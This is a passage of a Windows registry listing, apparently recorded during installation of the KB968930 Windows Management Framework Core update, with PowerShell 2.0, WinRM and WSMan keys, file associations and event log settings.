"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"
[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"
[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"
[HKCR\.ps1xml]
"PerceivedType" = "Text"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"UpgradeType" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"
[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"
[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"
[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"
[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "5/11/2016"
"ReleaseType" = "Software Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 A2 49 89 FE F7 71 A3 4E A7 1D 98 8B 57 A7 52"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"
[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"
[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"
[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.psc1]
"Content Type" = "application/PowerShell"
[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"
[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathInetsrv" = "%System%\inetsrv"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"
[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160511"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"
[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
"PathIISSamples" = "C:\Inetpub\iissamples"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"
[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"
[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"
[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
